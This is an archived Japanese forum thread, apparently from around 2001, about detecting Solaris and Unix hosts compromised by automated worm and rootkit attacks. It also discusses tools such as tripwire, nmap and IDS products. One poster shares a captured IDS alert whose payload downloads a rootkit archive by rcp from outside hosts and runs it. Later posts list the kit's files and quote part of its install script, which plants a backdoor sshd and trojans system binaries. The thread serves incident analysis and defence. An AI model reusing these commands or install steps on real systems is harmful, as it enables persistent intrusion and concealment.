トップページ⇒network
25コメント15KB

やられたホストの探し方

■ このスレッドは過去ログ倉庫に格納されています
0001るNGNG
あるunix/linux/windowsに集中的にスキャンかけられたとして、
そのホストがやられたかどうか知る方法ってありますかね?
たとえば最近のramen/lion53系ならほとんどポート10080(だっけ)に裏口が
あけられますよね。
0002るNGNG
今知りたいのは

 ntp系の検出方法
 111系(新Stacheldraht)の検出方法

やっぱりあやしげなICMPパケットを使ってスキャンするしかないのでしょうか?
0003anonymous@NGNG
そんなモン使ってるツールによるんだから
そういうツールが実際に出てくるまでチェックできるわけない。
大体その手のツール自体は高度でも、
それ利用したワームの裏口用ポート番号なんかショボイシェルスクリプトで
書かれてるんだから相当の厨房じゃない限り変えられるぞ。
あとあんた、portmapper自体に弱点があるって勘違いしてないか?
0004るNGNG
>>3
そりゃそーなんですが、最近の攻撃はアットランダムかつ自動化されていて、
判で押したような繰り返しの連続なんで。
最近はport111からのStachelが流行なので例にあげただけ。
00053NGNG
アットランダムで判を押したって矛盾してないか?
あと、
>最近はport111からのStachelが流行なので例にあげただけ。
いやだから、portmapper自体に弱点がある訳じゃないのは解ってる?

まあそれは良いとして、やられたホストの検出だろ?
俺が思いつくのはせいぜいトップページのタイムスタンプとか
md5とかを定期的にチェックする程度だな。
ウェブページ改竄しか検出できないけど。
あんたの言うところの、ICMP使う方法ってのはサッパリ想像つかないよ。
0006るNGNG
>>5
言葉が足らなくてすまん。
「アットランダム」ー>攻撃対象をあらかじめ選別したりせずIPをアットランダムに選んで攻撃してくる

つまり、現在おこなわれている攻撃の大部分は完全にパターン化されているので、
そのパターンが知りたかったわけです。もちろん>>3氏のおっしゃるように、そのパターンは厨房レベルでも
変えられるのですが、そんな面倒くさいことをせずに、数で押してくる式の方が多いように見受けられます。

もちろん、正確に言えばport111->snmpXdmid->inetd->port530->Stachelなのだが、
最初はport111の大規模スキャンから始まるもので・・・
Stachelについていえば、ポート111スキャンされたIPに対しcompromizeされているかどうかの
簡単な識別法がないかなあ、っと。

以前のStachelはID 668のICMP_ECHOREPLY、payloadにgesundheit!という文字列をいれたのを
送ると反応してくれた。今のは、知らない。
00073NGNG
まず謝っとこう。
スマン、中途半端に言葉だけ知ってる奴かと疑ってたよ(藁

>以前のStachelはID 668のICMP_ECHOREPLY、payloadにgesundheit!という文字列を
>いれたのを送ると反応してくれた。
あー、そういうプログラムが常駐するのか。
それならそういう判断もできるね。
でもやっぱり、それはツールセットの作者が決めることだから
広がるまではわかんないだろ。

最近一番広がってるsnmpXdmidの奴は、コレ↓なのかな?
http://www.securityfocus.com/templates/archive.pike?list=75&mid=177587&_ref=854754035
流し読みだけど、昔のとほとんど一緒らしいね。
ntpdのを使ったツールセットはまだ聞いたこと無いな。
ntpdの個体数自体が少ないからツールセット作者としても美味しくないんじゃないか?
あと、広く公開されてるサンプルのexploitコードがリモートアタック用じゃないし(藁
個人的にはftpdのglobバグもそれほど被害は無いんじゃないかと思ってるよ。

ちなみに目的は何なの?
00083NGNG
まず謝っとこう。
スマン、中途半端に言葉だけ知ってる奴かと疑ってたよ(藁

>以前のStachelはID 668のICMP_ECHOREPLY、payloadにgesundheit!という文字列を
>いれたのを送ると反応してくれた。
あー、そういうプログラムが常駐するのか。
それならそういう判断もできるね。
でもやっぱり、それはツールセットの作者が決めることだから
広がるまではわかんないだろ。

最近一番広がってるsnmpXdmidの奴は、コレ↓なのかな?
http://www.securityfocus.com/templates/archive.pike?list=75&mid=177587&_ref=854754035
流し読みだけど、昔のとほとんど一緒らしいね。
ntpdのを使ったツールセットはまだ聞いたこと無いな。
ntpdの個体数自体が少ないからツールセット作者としても美味しくないんじゃないか?
あと、広く公開されてるサンプルのexploitコードがリモートアタック用じゃないし(藁
個人的にはftpdのglobバグもそれほど被害は無いんじゃないかと思ってるよ。

ちなみに目的は何なの?
00093NGNG
ダブった
打つだし脳
0010名無しさんNGNG
この世界は「疑わしきは罰せず。」じゃなくて
「疑わしきはイニシャライズせよ。」だ。
0011るNGNG
530系(勝手に命名した)の攻撃があったので報告

結局外部からポート530へのコネクションを解析していたのだが昨晩釣れました。
やはりポート111のスキャンから始まって、(おそらくXdmid->inetd->port530)、
ポート530を一時的にあけてrootkitをrcpして、実行。
アットランダムなポートにsshd2をあけてました。ルートのパスワードもアットランダム。
噂のStachelははいっていないようです。別の虫さんなのかな?

現在、rootkitを解析中
0012るNGNG
肝心なことをいいわすれてた
対象はSolarisみたい。

rootkitは既存の穴(含むXdmid)をふさいでくれるスグレモン。
0013るNGNG
1 最初は111へのポートスキャン
2 不明(Xdmidまたはstatdの可能性あり)
3 ポート530から djakn.tarをロード、実行

[**] POSSIBLE CARKO BACKDOOR [**]
04/25-23:42:39.883121 0:0:C:8:D5:6 -> 0:10:11:FF:E0:0 type:0x800 len:0x1D1
212.32.130.10:34813 -> *.*.8.17:530 TCP TTL:230 TOS:0x0 ID:32333 IpLen:20 Dg
mLen:451 DF
***AP*** Seq: 0xCE8E2146 Ack: 0xCC16A0DC Win: 0x2238 TcpLen: 20
69 66 20 74 65 73 74 20 2D 64 20 2F 74 6D 70 2F if test -d /tmp/
2E 6E 65 77 20 3B 20 74 68 65 6E 20 65 78 69 74 .new ; then exit
20 3B 20 66 69 3B 0A 6D 6B 64 69 72 20 2F 74 6D ; fi;.mkdir /tm
70 2F 2E 6E 65 77 3B 0A 63 64 20 2F 74 6D 70 2F p/.new;.cd /tmp/
2E 6E 65 77 3B 0A 74 6F 75 63 68 20 63 6D 73 3B .new;.touch cms;
0A 65 63 68 6F 20 55 4E 46 20 55 4E 46 20 55 4E .echo UNF UNF UN
46 20 55 4E 46 72 63 70 20 6C 70 40 32 31 32 2E F UNFrcp lp@212.
33 32 2E 31 33 30 2E 31 30 3A 2E 2F 2E 78 2F 64 32.130.10:./.x/d
6A 61 6B 6E 2E 74 61 72 20 2E 2F 3B 0A 69 66 20 jakn.tar ./;.if
74 65 73 74 20 2D 66 20 64 6A 61 6B 6E 2E 74 61 test -f djakn.ta
72 3B 20 74 68 65 6E 20 72 6D 20 63 6D 73 3B 66 r; then rm cms;f
69 3B 0A 69 66 20 74 65 73 74 20 2D 66 20 63 6D i;.if test -f cm
73 20 3B 20 74 68 65 6E 20 72 63 70 20 61 64 6D s ; then rcp adm
40 73 69 72 69 75 73 2E 63 68 65 6D 69 65 2E 75 @sirius.chemie.u
6E 69 2D 62 6F 6E 6E 2E 64 65 3A 2F 76 61 72 2F ni-bonn.de:/var/
61 64 6D 2F 64 6A 61 6B 6E 2E 74 61 72 20 2E 2F adm/djakn.tar ./
3B 66 69 20 3B 0A 69 66 20 74 65 73 74 20 2D 66 ;fi ;.if test -f
20 64 6A 61 6B 6E 2E 74 61 72 3B 20 74 68 65 6E djakn.tar; then
20 74 61 72 20 2D 78 76 66 20 64 6A 61 6B 6E 2E tar -xvf djakn.
74 61 72 3B 2E 2F 73 65 74 75 70 20 51 68 74 58 tar;./setup QhtX
63 55 64 73 58 39 20 2D 70 20 39 37 30 37 3B 65 cUdsX9 -p 9707;e
78 69 74 3B 66 69 3B 0A 65 63 68 6F 20 46 55 43 xit;fi;.echo FUC
4B 45 44 20 46 55 43 4B 45 44 20 46 55 43 4B 45 KED FUCKED FUCKE
44 20 46 55 43 4B 45 44 20 46 55 43 4B 45 44 20 D FUCKED FUCKED
46 55 43 4B 45 44 20 46 55 43 4B 45 44 20 46 55 FUCKED FUCKED FU
43 4B 45 44 20 3E 63 6D 73 3B 0A CKED >cms;.


0014るNGNG
djakn.tarの内容

合計 2818
drwxr-xr-x 3 le staff 1024 4月 26 09:20 ./
drwxr-xr-x 2 le staff 512 4月 26 09:16 etc/
-rw-r--r-- 1 le staff 716800 4月 26 09:16 djakn.tar
drwxr-xr-x 6 le staff 512 4月 26 09:16 ../
-rw-r--r-- 1 le staff 9 4月 20 07:45 iver
-rwxr-xr-x 1 le staff 10234 4月 20 07:45 switch*
-rw-r--r-- 1 le staff 452 4月 19 08:42 README
-rwxr-xr-x 1 le staff 4651 4月 17 22:03 findkit*
-rwxr-xr-x 1 le staff 1815 4月 16 19:14 sz*
-rwxr-xr-x 1 le staff 17140 4月 16 07:57 ls*
-rwxr-xr-x 1 le staff 1825 4月 15 12:42 szl*
-rwxr-xr-x 1 le staff 11224 4月 14 04:05 ucbps*
-rw------- 1 le staff 358 4月 14 04:02 x.conf
-rwxr-xr-x 1 le staff 5416 4月 14 04:01 login*
-rwxr-xr-x 1 le staff 9520 4月 13 19:07 setup*
-rwxr-xr-x 1 le staff 35376 4月 13 06:28 l2*
-rwxr--r-- 1 le staff 5145 3月 23 20:53 cleaner*
-rwxr-xr-x 1 le staff 259832 2月 22 08:28 sshd*
-rw-r--r-- 1 le staff 106 2月 22 04:58 x.conf2
-rwxr-xr-x 1 le staff 8332 2月 2 18:17 pg*
-rwxr-xr-x 1 le staff 4469 1月 15 06:30 patcher*
-rwxr-xr-x 1 le staff 136288 1月 15 05:12 wget*
-rwxr-xr-x 1 le staff 12472 10月 24 2000 lsof*
-rwxr-xr-x 1 le staff 12052 10月 24 2000 su*
-rwxr-xr-x 1 le staff 8388 10月 24 2000 rpass*
-rwxr-xr-x 1 le staff 8672 10月 24 2000 crypt*
-rwxr-xr-x 1 le staff 12052 10月 24 2000 ping*
-rwxr-xr-x 1 le staff 12052 10月 24 2000 passwd*
-rwxr-xr-x 1 le staff 12720 10月 24 2000 ps*
-rwxr-xr-x 1 le staff 12352 10月 24 2000 netstat*
-rwxr-xr-x 1 le staff 12352 10月 24 2000 find*
-rwxr-xr-x 1 le staff 12352 10月 24 2000 du*
-rw-r--r-- 1 le staff 498 10月 23 2000 logo
-rwxr-xr-x 1 le staff 21424 10月 1 2000 sn2*
-rwxr-xr-x 1 le staff 335 10月 1 2000 sniffload*
-rwxr-xr-x 1 le staff 8024 10月 1 2000 utime*
-rwxr-xr-x 1 le staff 282 10月 1 2000 removekit*
-rwxr-xr-x 1 le staff 17 10月 1 2000 sver*
-rwxr-xr-x 1 le staff 11668 10月 1 2000 fix*

0015るNGNG
switchの内容(一部)

cp -f /usr/bin/xlogin /usr/bin/login
fi
./fix /usr/bin/login ./login /usr/bin/xlogin
printf " login"

cp -f sshd /usr/bin/sshd2
chmod 755 /usr/bin/sshd2
echo "Port ${PORT}" >etc/sshd_config
cat etc/tconf >>etc/sshd_config
rm -f etc/tconf
cp etc/* /usr/bin/
echo "/usr/bin/sshd2 -q" >>/etc/rc2
echo "/usr/bin/sshd2 -q" >>/etc/rc3
/usr/bin/sshd2 -q
printf " sshd"

trojan netstat /usr/bin/netstat
trojan ls /usr/bin/ls
trojan passwd /usr/bin/passwd
trojan du /usr/bin/du
trojan find /usr/bin/find
trojan lsof /usr/local/bin/lsof
trojan ping /usr/sbin/ping
trojan su /bin/su
0016anonymous@ip57-009.win.ne.jpNGNG
tripwireとか、パッケージシステムの確認機能(ex.rpm -Va)、
あと、nmapでスキャンとかで、とりあえずはいいんじゃないのぉ
md5sumやtripwireの情報は、一通り設定が終わったら、
書き換えられないようにcd-rにでも焼いておこう
0017るNGNG
>>16
それもわかってるのだけど、こちとらは何の権限も持たないネット監視人。
ある内部ホストがやられたと判っても、通告だけで内部の調査すらできない。♪
でも、今回の侵入でホスト4台やられたのがわかって、やっとIDS買ってもらえることになりそう。
0018nobody@fusianasasoNGNG
nmapで定期巡回なんかどうよ
たとえば、自分の会社のグローバルIPか、
10.1.2.0/24だったら、
# nmap -O -p 1-65000 10.1.2.1-10.1.2.254 | mail hogehoge とか
へんなポートにバックドア仕掛けられたらみつけれそう
0019anonymous@ntttkyo22176.ppp.infoweb.ne.jpNGNG
うちでもIDSの購入を検討しています。
どこかお勧めありますか?
0020名無しさん@そうだMAE-WESTをDDoSしようNGNG
>>19

network base or host base ?
host ベースならtripwire かなぁ
0021anonymous@ntttkyo22176.ppp.infoweb.ne.jpNGNG
network ベース。
でも、ついでに host ベースの情報もクレークレー
0022   NGNG
firewall-1と相性がよいIDSッテ何かある?
0023mu-NGNG
ICEってWindowsベースなんだよね。
そこんとこがちょっと。
意味なく高いし。
0024るNGNG
ICEはWindowsベースだし、CISCOはバカ高い。
結局、IISに落ち着きそうだけど(firewall-1との連携もできるみたい)、
なんか説明聞いているとsnortのほうがいいみたい。

それはそうと、BUGTRAQに中国の対米サイバーテロのツールが流れていたけど
あいかわらず1i0nなのね。。。
0025るNGNG
結局Sun/solaris2台+IIS
Linux3台 Tripware
てな構成にしました。

いくらぐらいかしらん?
■ このスレッドは過去ログ倉庫に格納されています